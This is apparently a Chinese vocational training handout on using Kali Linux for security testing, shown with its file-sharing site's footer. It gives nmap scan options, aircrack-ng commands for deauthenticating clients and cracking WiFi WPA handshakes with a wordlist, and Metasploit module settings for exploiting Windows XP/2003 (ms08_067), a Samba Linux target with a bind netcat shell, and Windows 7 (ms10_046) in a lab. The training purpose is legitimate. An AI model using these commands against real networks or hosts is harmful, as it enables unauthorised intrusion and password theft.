版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
任务十五:KALI操作系统的配置和使用15.1任务资讯15.1.1任务描述某单位在网络安全检查中,需要使用KALI操作系统,用于网络安全检测及调查取证。系统管理员在使用KALI过程中,需要使用安全漏洞检测工具以及无线安全工具检验密码强度及系统的强壮性。
15.1.2任务目标工作任务KALI服务器的安全工具使用学习目标掌握KALI服务器的安全工具使用实践技能1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP攻击windows20034.使用安全漏洞检测工具攻击LINUX靶机攻击windows7知识要点1.学习NMAP安全工具2.学习aircrack安全工具破解wifi密码3.学习安全漏洞检测工具攻击windowsXP、windows20034.使用安全漏洞检测工具攻击LINUX、windows715.2决策指导1.无线网络检测2.渗透测试软件检测操作系统安全15.3制定计划KaliLinux预装了许多渗透测试软件,包括nmap、Wireshark、JohntheRipper,以及Aircrack-ng等。01-InformationGathering(信息收集)02-VulnerabilityAssessment(弱点评估)03-WebApplicationAnalysis(Web应用程序分析)04-DatabaseAssessment(数据库评估)05-PasswordAttacks(密码攻击)06-WirelessAttacks(无线攻击)07-ReverseEngineering(逆向工程)08-ExploitationTools(渗透工具)09-Sniffing&Spoofing(嗅探和欺骗)10-PostExploitation(渗透以后)11-Forensics(取证工具)12-ReportingTools(报告工具)13-SocialEngineeringTools(社会工程工具)14-SystemServices(系统服务)Usualapplications(常用应用)15.4任务实施15.4.1学习NMAP安全工具1.在Kali系统上可以开启SSH服务2.字典生成软件crunch3.NMAP工具软件Nmap常用
参数参
数说
明-sPping扫描,Nmap在扫描端口时,默认都会使用ping扫描-sL简单列表扫描-sn使用PING主机方式-sV监测端口服务版本操作系统信息主机名等-sS半开扫描-sTTCP方式扫描,会在目标主机的日志中记录大批连接请求和错误信息。-sUUDP扫描,UDP扫描是不可靠的-sA这项高级的扫描方法通常用来穿过防火墙的规则集-sF-sN秘密FIN数据包扫描、XmasTree、Null扫描模式-sC脚本扫描-A全面系统检测、启用脚本检测、扫描等-O启用远程操作系统检测,但可能存在误报-V-v-v显示扫描过程,推荐使用-PN扫描之前不使用ping命令-p指定端口,如“1-65535、1433、135、22、80、3389”等-h帮助文档-T4针对TCP端口禁止动态扫描延迟超过10ms设置时间模板-iL读取主机列表,“-iLD:\iplist.txt”-oN-oX-oG将报告写入文件,分别是正常、XML、grepable三种格式-traceroute路由跟踪扫描--script按照脚本分类进行扫描-6开启IPv6扫描举例(1)扫描指定IP所开放的端口:nmap-sS-p1-65535-v举例(2)扫描C段存活主机:nmap-sP/24举例(3)指定端口扫描:nmap-p80,1433,22,1521举例(4)探测主机操作系统:nmap-o举例(5)全面的系统探测:nmap-v-A(nmap默认扫描主机1000个高危端口)举例(6)探测指定网段:nmap-10举例(7)穿透防火墙进行扫描:nmap-Pn-A(禁止用ping的)举例(8)使用脚本,扫描Web敏感目录:nmap-p80--script=http-enum.nse15.4.2学习aircrack安全工具破解wifi密码1.需要环境2.所需要命令(1)airmon-ng #命令检查网卡是否支持监听模式,使用airmon-ngcheckkill命令关闭无关进程(2)airmon-ngstartwlan0 #开启无线网卡的监听模式,使用iwconfig命令确认网卡为监听模式(3)airodump-ngwlan0mon #搜索周围的WiFi网络(4)airodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0mon #抓取无线数据包(5)aireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0mon #攻击已连接设备airodump-ng-c1--bssid00:27:19:6F:26:04-w2604wlan0monaireplay-ng-05-a00:27:19:6F:26:04-cA8:88:08:3f:AE:11wlan0mon(6)airmon-ngstopwlan0mon #停止抓包结束无线网卡的监听模式(7)aircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap #暴力破解指定文件包aircrack-ng-a2-b00:27:19:6F:26:04-wdie.txt2604其他可能用到的命令:ifconfig、iwconfig、airmon-ngcheckkill。暴力破解步骤开启网关监听模式确认网卡模式、扫描WIFI热点抓取握手包、强制设备重连抓取到握手包、结束监听模式获得WIFI密码15.4.3学习安全漏洞检测工具攻击windowsXP1.Metasploit工具Metasploit工具一般攻击的过程:(1)获得EIP指令寄存器。(2)插入shellcode代码或填充数据获取权限。(3)反向连接shell。即将目标主机当做服务,攻击者机器作为客户端。(4)添加用户或进行其它操作。首先利用扫描器的插件探测目标系统的安全漏洞查找适用模块选择08-067模块配置模块、渗透成功执行命令:ps查看目标主机进程从控制端添加用户hack3.渗透实操:攻击windows2003useexploit/Windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpsetRHOST38setLHOST37settarget3配置参数、成功获取session通过远程桌面登录4.渗透实操:攻击linux靶机命令列表searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploit查找攻击Samba的模块选择模块、设定攻击载荷5.渗透实操:通过10-046漏洞攻击windows7对Windows7的扫描结果漏洞选择查看参数、配置监听地址攻击载荷配置、开始攻击打开会话本小节用到的命令useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37评价指标及评价内容★★★★★★评价方式基本操作20分部署KALI操作系统
教师评价开启SSH学习crunch密码工具
动手做20分(重现)学习aircrack安全工具
自我评
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 二零二四年度软件开发合同标的及服务内容详细描述2篇
- 二零二四年度供应链金融服务创新与合作合同2篇
- 2024年房产继承合同
- 二零二四年度企业并购金额及股权转让合同
- 冬季清雪与城市公共服务合同(2024版)2篇
- 2024年度隔墙板材料采购合同范本3篇
- 钟点工保洁劳务合同
- 二零二四年度电子产品有限公司供应链管理合同3篇
- 工程分包合同范本2024年修订版
- 2024年度体育赛事裁判人工费承包合同2篇
- 学校食品安全主体责任制度
- 2024年广州市海珠区海幢街道办事处招考聘用雇员9人高频500题难、易错点模拟试题附带答案详解
- 电除颤并发症的处理及预防
- 国企投资岗笔试题目
- 南京旅游文化介绍课件
- 2024-2030年ICT技术行业市场发展分析及发展趋势与投资前景研究报告
- 佳能EOS700D使用说明书
- 人工智能医疗与生命科学行业研究报告
- 12CJ35 珍珠岩吸声板吊顶与墙面构造-崔申珍珠岩吸声板
- 2024广西专业技术人员继续教育公需科目参考答案(100分)
- 人教新课标二年级数学上册2.2.1 《不退位减》说课稿3
评论
0/150
提交评论